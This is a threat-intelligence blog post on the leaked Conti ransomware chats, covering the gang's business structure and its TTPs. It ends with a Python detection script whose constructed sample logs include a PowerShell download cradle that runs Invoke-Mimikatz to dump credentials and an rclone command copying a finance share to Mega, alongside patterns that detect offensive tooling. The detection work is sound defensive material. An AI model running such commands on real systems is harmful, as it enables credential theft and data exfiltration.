Look Inside Ransomware Gang Through Conti Leaks

Published On : 2022-03-19

The Conti gang is one of the largest cybercrime syndicates in the world. Third-party blockchain analysis of its bitcoin wallets estimates annual revenue of up to USD 200 million. Recently leaked chat logs of the group provide unprecedented insight into the life and operations of the gang. From leave requests to internal cybersecurity practices and the TTPs used in attacks, these leaks are sure to be studied by analysts for weeks and months to come. Our research team at CYFIRMA has focused mainly on extracting IOCs and TTPs, but has also observed interesting insights into the gang’s inner workings.

How are they organized?

After the arrest of REvil members, the Conti gang now dominates the scene of so-called “big game hunting” groups (those focused only on large companies with more than USD 100m in annual revenue). Insights from the leaked conversations confirm what threat researchers, including CYFIRMA as part of our 2022 Predictions [https://www.cyfirma.com/cyfirma-cybersecurity-predictions-2022/], have suspected and speculated: top cybercriminal gangs are organized and operate as a business within their own little industry of cybercrime. This includes outsourcing (for example, to initial access brokers), typical HR problems, physical offices and, of course, performance reviews.

With the RaaS business booming, the need for reliable talent, from low-level programmers to highly skilled pentesters, has grown as well. The leaked chat logs contain conversations with dedicated HR personnel and promotion of referral programs with bonuses. Particularly fascinating and shady is the practice of abusing legitimate headhunting services to hire employees who have no idea who they are really working for. The pressing matter appears to be talent retention, as the pay is not great, the working hours are grueling, and the work at the Conti “company” is a repetitive cycle of monotonous tasks.

Also discussed are operational inconsistencies and the struggle to maintain infrastructure. Domains, VPNs and other services are not properly tracked and renewed on time, so networks of compromised hosts that call back to a lapsed domain are simply lost. High employee turnover also appears to cause human errors in the malware itself, where simple misconfigurations result in failed breaches and lost profit.

How do they operate?

Before we jump into the hacking and tools used, it is worth noting Conti’s use of business intelligence to learn about its victims. They are particularly interested in reported revenue, information about available cash, and whether an organization has ransomware/cybersecurity insurance. They also look for contact details of executives or board members in order to harass them and pressure them into paying the ransom. Two paid tools specifically mentioned were ZoomInfo and Crunchbase.

Another interesting observation is their shopping for all sorts of cybersecurity products. Naturally, they want to protect themselves against being hacked by the competition or law enforcement, so they buy antivirus and EDR solutions for their own defense. At the same time, they buy licenses for all major cybersecurity products to test their own malware and TTPs against them, to keep them functional and stay at least one step ahead in this never-ending cat-and-mouse race.

The final point is their suspected collaboration with Russian government agencies. While there is still no concrete evidence, even in these leaks, there are mentions of the FSB and of Conti allegedly attacking an organization to gather information for the FSB.

How do they attack – TTPs?

Among the IOCs and TTPs CYFIRMA extracted, there is a clear absence of any initial access tooling, implying heavy reliance on initial access brokers and affiliates to take care of that side of the business. From the snippet below, it appears that Conti’s focus is on the speed of lateral movement and on access to email.

The snippet of GitHub repositories mentioned in leaked Conti chat logs

Download the links Conti Ransomware_Mar 2022_GitHub.

While the CYFIRMA research team extracted many more TTPs and CVEs from the leaks, from GitHub and beyond, this snippet illustrates some of Conti’s favorites. It is clear that they are not trying to reinvent the wheel, relying heavily instead on existing and readily available tools. Their own coders focus on the locker code and on botnet networks.

Combining the previously leaked Conti playbook with these recent chat leaks, we can quite clearly see the preferred protocols and systems to exploit and the tools used for it. Once initial access is obtained, usually from third-party brokers, Conti is well equipped to establish persistence and move laterally for maximum damage in the shortest time possible.

Here are the observations of the CYFIRMA research team.

  1. Native OS commands and tools, and PowerShell in particular, have become the universal way to execute most or even all of the attack flow. They are already present in victims’ networks, which increases the crucial speed of the operation and helps evade detection. Nearly all tools leveraged are used in their PowerShell versions, including Mimikatz and PowerSploit.
  2. Heavy reliance on Cobalt Strike and its malleable C2 profiles. A large portion of the observed GitHub repositories were dedicated to Cobalt Strike and its configuration, including improved menu options for the framework.
  3. SMB and RDP are the protocols of choice for lateral movement; Conti’s arsenal includes tools both for scanning these protocols and for directly exploiting vulnerabilities in the services reachable over them. Conti has been particularly quick to adopt the latest such exploits, for example PrintNightmare, a Windows Print Spooler flaw that is triggered remotely over RPC carried on SMB.
  4. In the initial stages of an attack, Conti appears to prefer Kerberoasting when a large environment of more than 3,000 hosts is discovered. They also discuss the continuity and stability of their bots and of share dumping, since network discovery and enumeration is an hours-long process.
  5. Mimikatz, UAC bypass and Zerologon form the privilege escalation holy trinity, with some help from NTDS dumps. These tools and TTPs appear to be a reliable toolkit that works against most of their victims. There is a whole plethora of other mentions, but these, and especially PowerShell Mimikatz, are the gang’s gold standard.
  6. Unsurprisingly, MS Exchange RCE exploits appear frequently. If attackers could pick one data set with which to extort a victim, it would be email.
  7. For data exfiltration, the Mega.io platform combined with the “rclone.exe” tool has been the gang’s top choice for some time. We have also found the DNS tunneling PowerShell tool “Invoke-DNSteal”.
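As an added example that is not part of the original CYFIRMA write-up, the following Python script sketches detection logic for five of the TTPs listed above: Kerberoasting (RC4 service-ticket requests for many SPNs), PowerShell Mimikatz download cradles, rclone pushing data to a Mega remote, Zerologon (a machine-account password change by an anonymous caller), and DNS tunneling (long, high-entropy labels under one zone). The event records, hostnames, users and domains are constructed for the example; the field names only approximate Windows Security (4769, 4742) and Sysmon (EID 1, EID 22) events; and the thresholds and the ANONYMOUS LOGON/4742 heuristic are assumptions a detection engineer would tune against their own telemetry.

```python
# Toy detection rules for the Conti TTPs listed above, run over constructed
# telemetry shaped like Windows Security events (4769, 4742) and Sysmon
# process-creation (EID 1) / DNS-query (EID 22) events. Not real logs.
import math
import re
from collections import Counter, defaultdict

RC4_HMAC = "0x17"  # Kerberos etype requested by classic Kerberoasting; AES is 0x11/0x12
# Command-line markers for the PowerShell tooling named above plus common download cradles.
OFFENSIVE_PS_RE = re.compile(
    r"Invoke-Mimikatz|DumpCreds|sekurlsa|Invoke-Kerberoast|PowerSploit|Invoke-DNSteal"
    r"|DownloadString\(|FromBase64String\(", re.IGNORECASE)
# rclone remotes look like "<remote>:<path>"; the lookahead skips drive letters like C:\.
RCLONE_REMOTE_RE = re.compile(r"\s([A-Za-z0-9_-]+):(?![\\/])")


def shannon_entropy(s):
    """Bits per character; long high-entropy DNS labels suggest encoded data."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def registered_domain(fqdn):
    """Naive last-two-labels zone (ignores public-suffix rules such as .co.uk)."""
    return ".".join(fqdn.rstrip(".").split(".")[-2:])


def detect_kerberoasting(events, min_services=10):
    """One user requesting RC4 service tickets for many distinct SPNs."""
    spns = defaultdict(set)
    for e in events:
        if e.get("event_id") == 4769 and e.get("enc_type") == RC4_HMAC:
            spns[(e["host"], e["user"])].add(e["service"])
    return [{"rule": "kerberoasting", "host": h, "detail": {"user": u, "services": len(s)}}
            for (h, u), s in spns.items() if len(s) >= min_services]


def detect_offensive_powershell(events):
    """powershell.exe whose command line matches a known offensive marker."""
    out = []
    for e in events:
        if e.get("event_id") == 1 and e.get("image", "").lower().endswith("powershell.exe"):
            m = OFFENSIVE_PS_RE.search(e.get("cmdline", ""))
            if m:
                out.append({"rule": "offensive_powershell", "host": e["host"],
                            "detail": {"match": m.group(0)}})
    return out


def detect_rclone_exfil(events):
    """Any rclone execution, recording the remote (e.g. 'mega') it targets."""
    out = []
    for e in events:
        if e.get("event_id") == 1 and e.get("image", "").lower().endswith("rclone.exe"):
            m = RCLONE_REMOTE_RE.search(e.get("cmdline", ""))
            out.append({"rule": "rclone_exfil", "host": e["host"],
                        "detail": {"remote": m.group(1) if m else None}})
    return out


def detect_zerologon(events):
    """Computer account changed (4742) by ANONYMOUS LOGON: a Zerologon heuristic."""
    return [{"rule": "zerologon", "host": e["host"], "detail": {"target": e["target"]}}
            for e in events if e.get("event_id") == 4742
            and e.get("subject_user", "").upper() == "ANONYMOUS LOGON"
            and e.get("target", "").endswith("$")]


def detect_dns_tunneling(events, min_queries=3, min_label_len=30, min_entropy=3.5):
    """Repeated queries to one zone whose leftmost labels are long and high-entropy."""
    per_zone = defaultdict(list)
    for e in events:
        if e.get("event_id") == 22 and e.get("query"):
            per_zone[(e["host"], registered_domain(e["query"]))].append(e["query"].split(".")[0])
    out = []
    for (host, zone), labels in per_zone.items():
        avg_len = sum(map(len, labels)) / len(labels)
        avg_ent = sum(map(shannon_entropy, labels)) / len(labels)
        if len(labels) >= min_queries and avg_len >= min_label_len and avg_ent >= min_entropy:
            out.append({"rule": "dns_tunneling", "host": host,
                        "detail": {"zone": zone, "avg_entropy": round(avg_ent, 2)}})
    return out


def run_all(events):
    rules = (detect_kerberoasting, detect_offensive_powershell, detect_rclone_exfil,
             detect_zerologon, detect_dns_tunneling)
    return [f for rule in rules for f in rule(events)]


# Constructed sample telemetry; hosts, users and domains are invented.
SAMPLE_EVENTS = (
    # 12 RC4 TGS requests for distinct SQL SPNs from one workstation (Kerberoasting)
    [{"event_id": 4769, "host": "WS-0142", "user": "jdoe", "enc_type": RC4_HMAC,
      "service": f"MSSQLSvc/sql{i:02d}.corp.example:1433"} for i in range(12)]
    + [  # a normal AES ticket request from another host
       {"event_id": 4769, "host": "WS-0003", "user": "asmith", "enc_type": "0x12",
        "service": "HTTP/web01.corp.example"},
       # download cradle pulling Invoke-Mimikatz, then a credential dump
       {"event_id": 1, "host": "WS-0142",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString("
                   "'http://10.0.0.5/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\""},
       # staged file share copied to a Mega remote with rclone
       {"event_id": 1, "host": "FS-01", "image": r"C:\Users\Public\rclone.exe",
        "cmdline": r"rclone.exe copy \\fs-01\finance mega:backup --transfers 32"},
       # DC machine-account password reset by an anonymous caller
       {"event_id": 4742, "host": "DC01", "subject_user": "ANONYMOUS LOGON", "target": "DC01$"},
       {"event_id": 22, "host": "WS-0003", "query": "www.microsoft.com"}]  # benign lookup
    # long hex-looking labels under one zone: data leaving over DNS
    + [{"event_id": 22, "host": "WS-0142", "query": f"{label}.t.cdn-example.net"} for label in
       ("0123456789abcdef0123456789abcdef01234567", "89abcdef0123456789abcdef0123456789abcdef",
        "fedcba9876543210fedcba9876543210fedcba98")]
)

if __name__ == "__main__":
    for finding in run_all(SAMPLE_EVENTS):
        print(finding)
```

Running the script prints one finding per rule for the constructed sample, and nothing for the benign host. In a real SIEM each rule maps to its own event source, the Kerberoasting threshold should come from a baseline of normal RC4 ticket volume (legacy services still request RC4 tickets), and the rclone rule should be paired with an allowlist of sanctioned remotes rather than treated as a definitive alert on its own.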

Conclusion and look into the future

It has been very insightful to see the Conti gang’s preferred methods and tools and how they operate. Like anyone else, they stick to what works and make incremental changes to ensure it keeps working, without drastically changing any part of their playbook. From a threat research and defense perspective, this provides valuable information on what to focus on. Notable is the universal adoption of OS-native tools and PowerShell, which is living off the land in practice and is very likely to evolve further in that direction.

From an organizational perspective, their somewhat impressive and unexpected “ordinary business” structure still has major problems and clearly struggles with efficiency and consistency. However, we can expect these to get ironed out, and consequently the gang will continue to get better and more dangerous to organizations around the world.

Finally, many are speculating whether this is the end of Conti. It likely is not. They have had leaks before, and judging by the size of their operation, they seem almost too big to fail. The suspected connection to the Russian government makes the discontinuation of Conti even less likely. If it comes to the worst, they are most likely to follow the time-proven strategy of taking a break and coming back stronger than ever under a new brand.
